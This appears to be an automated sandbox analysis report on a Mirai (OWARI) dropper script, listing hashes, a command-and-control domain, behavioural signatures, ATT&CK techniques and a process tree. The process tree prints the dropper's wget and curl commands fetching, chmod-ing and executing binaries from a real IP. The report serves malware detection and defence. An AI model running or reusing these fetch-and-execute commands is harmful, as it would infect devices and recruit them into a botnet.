Analysis
-
max time kernel
136s -
max time network
146s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
-
submitted
26/03/2025, 09:08
General
-
Target
bash.sh
-
Size
2KB
-
MD5
e9d282fe04078b2d45522facfce2df0b
-
SHA1
3cf77dfbbc7cf114515f94e5ecd0c38c3819fd83
-
SHA256
8325ad7ebed7fdd287cc0cd89f81a51617a64b38d09fa3d84c9141477e0dd415
-
SHA512
26e33128cbbacccc6897c50e723342c6f11c31668353ae553de4a96ac6af7634921a0f269141f11acc4928d8d17edcd9dacd022b949b7a42776df5c248629096
Malware Config
Extracted
mirai
OWARI
newageofkifirempire.camdvr.org
Extracted
mirai
OWARI
Extracted
mirai
OWARI
Extracted
mirai
OWARI
newageofkifirempire.camdvr.org
Extracted
mirai
OWARI
newageofkifirempire.camdvr.org
Extracted
mirai
OWARI
newageofkifirempire.camdvr.org
Signatures
-
Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 10 IoCs
-
Modifies Watchdog functionality 1 TTPs 4 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Creates/modifies environment variables 1 TTPs 1 IoCs
Creating/modifying environment variables is a common persistence mechanism.
-
Enumerates active TCP sockets 1 TTPs 2 IoCs
Gets active TCP sockets from /proc virtual filesystem.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies Bash startup script 2 TTPs 1 IoCs
-
Changes its process name 2 IoCs
-
Reads system network configuration 1 TTPs 2 IoCs
Uses contents of /proc filesystem to enumerate network settings.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/bash.sh/tmp/bash.sh1⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Creates/modifies environment variables
- Enumerates active TCP sockets
- Modifies Bash startup script
- Changes its process name
- Reads system network configuration
- Reads runtime system information
-
/usr/bin/wgetwget --quiet 141.98.10.122/GoldAge3ATOarm2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -s -O 141.98.10.122/GoldAge3ATOarm2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 GoldAge3ATOarm2⤵
- File and Directory Permissions Modification
-
-
/tmp/GoldAge3ATOarm./GoldAge3ATOarm2⤵
-
-
/bin/rmrm -rf GoldAge3ATOarm2⤵
-
-
/bin/rmrm -rf GoldAge3ATOarm.12⤵
-
-
/usr/bin/wgetwget --quiet 141.98.10.122/GoldAge3ATOarm62⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -s -O 141.98.10.122/GoldAge3ATOarm62⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 GoldAge3ATOarm62⤵
- File and Directory Permissions Modification
-
-
/tmp/GoldAge3ATOarm6./GoldAge3ATOarm62⤵
-
-
/bin/rmrm -rf GoldAge3ATOarm62⤵
-
-
/bin/rmrm -rf GoldAge3ATOarm6.12⤵
-
-
/usr/bin/wgetwget --quiet 141.98.10.122/GoldAge3ATOm68k2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -s -O 141.98.10.122/GoldAge3ATOm68k2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 GoldAge3ATOm68k2⤵
- File and Directory Permissions Modification
-
-
/tmp/GoldAge3ATOm68k./GoldAge3ATOm68k2⤵
-
-
/bin/rmrm -rf GoldAge3ATOm68k2⤵
-
-
/bin/rmrm -rf GoldAge3ATOm68k.12⤵
-
-
/usr/bin/wgetwget --quiet 141.98.10.122/GoldAge3ATOmips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -s -O 141.98.10.122/GoldAge3ATOmips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 GoldAge3ATOmips2⤵
- File and Directory Permissions Modification
-
-
/tmp/GoldAge3ATOmips./GoldAge3ATOmips2⤵
- System Network Configuration Discovery
-
-
/bin/rmrm -rf GoldAge3ATOmips2⤵
- System Network Configuration Discovery
-
-
/bin/rmrm -rf GoldAge3ATOmips.12⤵
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget --quiet 141.98.10.122/GoldAge3ATOmpsl2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -s -O 141.98.10.122/GoldAge3ATOmpsl2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 GoldAge3ATOmpsl2⤵
- File and Directory Permissions Modification
-
-
/tmp/GoldAge3ATOmpsl./GoldAge3ATOmpsl2⤵
-
-
/bin/rmrm -rf GoldAge3ATOmpsl2⤵
-
-
/bin/rmrm -rf GoldAge3ATOmpsl.12⤵
-
-
/usr/bin/wgetwget --quiet 141.98.10.122/GoldAge3ATOppc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -s -O 141.98.10.122/GoldAge3ATOppc2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 GoldAge3ATOppc2⤵
- File and Directory Permissions Modification
-
-
/tmp/GoldAge3ATOppc./GoldAge3ATOppc2⤵
-
-
/bin/rmrm -rf GoldAge3ATOppc2⤵
-
-
/bin/rmrm -rf GoldAge3ATOppc.12⤵
-
-
/usr/bin/wgetwget --quiet 141.98.10.122/GoldAge3ATOsh42⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -s -O 141.98.10.122/GoldAge3ATOsh42⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 GoldAge3ATOsh42⤵
- File and Directory Permissions Modification
-
-
/tmp/GoldAge3ATOsh4./GoldAge3ATOsh42⤵
-
-
/bin/rmrm -rf GoldAge3ATOsh42⤵
-
-
/bin/rmrm -rf GoldAge3ATOsh4.12⤵
-
-
/usr/bin/wgetwget --quiet 141.98.10.122/GoldAge3ATOspc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -s -O 141.98.10.122/GoldAge3ATOspc2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 GoldAge3ATOspc2⤵
- File and Directory Permissions Modification
-
-
/tmp/GoldAge3ATOspc./GoldAge3ATOspc2⤵
-
-
/bin/rmrm -rf GoldAge3ATOspc2⤵
-
-
/bin/rmrm -rf GoldAge3ATOspc.12⤵
-
-
/usr/bin/wgetwget --quiet 141.98.10.122/GoldAge3ATOx642⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -s -O 141.98.10.122/GoldAge3ATOx642⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 GoldAge3ATOx642⤵
- File and Directory Permissions Modification
-
-
/tmp/GoldAge3ATOx64./GoldAge3ATOx642⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
-
-
/bin/rmrm -rf GoldAge3ATOx642⤵
-
-
/bin/rmrm -rf GoldAge3ATOx64.12⤵
-
-
/usr/bin/wgetwget --quiet 141.98.10.122/GoldAge3ATOx862⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -s -O 141.98.10.122/GoldAge3ATOx862⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 GoldAge3ATOx862⤵
- File and Directory Permissions Modification
-
-
/bin/rmrm -rf GoldAge3ATOx862⤵
-
-
/bin/rmrm -rf GoldAge3ATOx86.12⤵
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Privilege Escalation
Boot or Logon Autostart Execution
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
42KB
MD5b58316c521f8621ace5b4a883ae495a1
SHA171e2344a723a0066ae1fe80d26b63f71d85fe6d1
SHA256f4aaffa4c2dd047542f38e60afa96554cff53c6083aefbeae49c2f2ccc183608
SHA512c7181cd78fc97e0158d9ccf01c8bd7c65776eb344c3828cecd71eb92e8ef0ef84e50f018a8d154015baf3a3ec7b7404a5d9f5678d5a3b782ca190fb88a8afeae
-
Filesize
53KB
MD54e25a773ef66310a0b4fe7129ba20de4
SHA1d57058a515beb010a7e96c2ac3ba8fd2b0ebca99
SHA256127a8f9ef876f72c390896631c14d7b406d127408917f9e395a2931d8a81b955
SHA512df6aea653867d4bf77da88c37dd4b6160247e4e19dd104a94abd155859e47d3cbf6648dbfc1fe9e02eed6cd60496a7c67a3daaeb9f01d8ecb9073d63cc3726d8
-
Filesize
41KB
MD508c43f317206176398da4ce873c9b077
SHA1acd7c6d4cf6961d335eb5560504f5b51a83468fc
SHA25644b381bde81d6386a8713a1f5a89c4f5511dd5471048046b9deef96bed7ef779
SHA51241d0723f553ebf931111d601630b4be1e91745e9a44c5763765d1df25602abb58fc5b584cec8f8177e98ccc9d0febd00193fd084e79bb4b8906c6f0fe8725b57
-
Filesize
53KB
MD5b25adc97864efce4fad6915113d432bb
SHA1f83b6b19bc9080737efdcc36355065183b1f2873
SHA256a587e7c7f11dbc533f4eca031049ac269da0356b97195612993d4fbad9b2d2a7
SHA5121b7252f5b68b6547bb28de7551161698bb3f9caf7a218432f3abaeb28aafad9483eba08697cc23191da492118cba2182f80d250e1768dc2402012b742dabe840
-
Filesize
55KB
MD5c4b8705dc8ae7e51d0122b4afeb9bed5
SHA12c3aec92a0f61e67e1870436ed01544fd960dc52
SHA25692154f4dfb53fcaaa598b1e8cdf408043694f4714f8ccce544d5ce6abfdd6724
SHA512b27a9ba545f3fd5ac648fee463317987dd6eac754c76c667c876ada5c039616fa788e948e49e9d6c1f2b58f18a3bc8cb87daeeb00f40f8f6540ecb80e8a6f52a
-
Filesize
39KB
MD5d6127758c157cc32f612951c5ca51457
SHA1bb78b97a08e5ae9bd9758f9bb292e148b539ba61
SHA256790599cb608623c255987fa21bacdeed32b540e84a9c4f206b7ebcd3d5f076e9
SHA512f31669ca46b566426355b152f64bd66b06b0c2e5ad26d55d4b98746c2bc6accf45e56f5eb454d7c50fea5d580325300298a18149ad37f7def9b44c66e7db2815
-
Filesize
36KB
MD589efd2e14dc8613ffda292cf3d390ceb
SHA178c7e51fb2bee42e6a927ea9879393e35000c4c9
SHA256b1d71bff5722d0a1a0e231ccd55baae4a74ef9dc6e7e17d0d73dbe270d9e7378
SHA512babb272c58305f19ec0ee6779b40d343cb50ef50959e47e26aba4fcbd9f53839e0a379040f67fc481a144f79e9d704de09b8e9cbbf5a2b2842e897e37dc2e1fd
-
Filesize
44KB
MD5e19a9d8e5622b1fa1736dc49cf00be55
SHA17c8768a86172280ee05e65617ddca3809e2a41c0
SHA2562e94d64031cbc545e1c446f7d89ab70072b2781e47f98b1c193456a56f935bef
SHA5129d4a941b53525b783419a570906e49d964d0fcb6affdf41f0e23aaa8e5a2abbb2645ba1f4feac64d09c67a7c6cf681ad1151382efde5be154501ac2b99349b5d
-
Filesize
41KB
MD5b70cf616255d6fba57636332d273b317
SHA1514ac1e551e002786d0141ae9d4268b544f8a2ad
SHA2563267485f753ca20ad6384328b42444aaaaad5746776b38b8b2d707f5f0439931
SHA5124297c7c0149f9bd1ef816a9735de167afa7c3d48d09954abcfdca3395e4c8852688b4b3e34fdc6996d69e2075e74a290a71ecee973bbe3ad6ade141b0df7ca6a
-
Filesize
37KB
MD5f50130b7f6ee3b9cd3cebc8d7f7cc3b1
SHA1b10d1f9aa72bf0127efbcb87fd7d4bda67ad678a
SHA256188ec8f91895242ab4affa2595820b2a303810b981607866f368a9baaa40d1ac
SHA51242d33fbe0c8179d75b6dace087673cf7f3c6d175596bd869b75d0dc939f9c44ffd5b763ed3a02113f43e2598539af891a57b77cdb9b7ffa50f075a9d5fef8423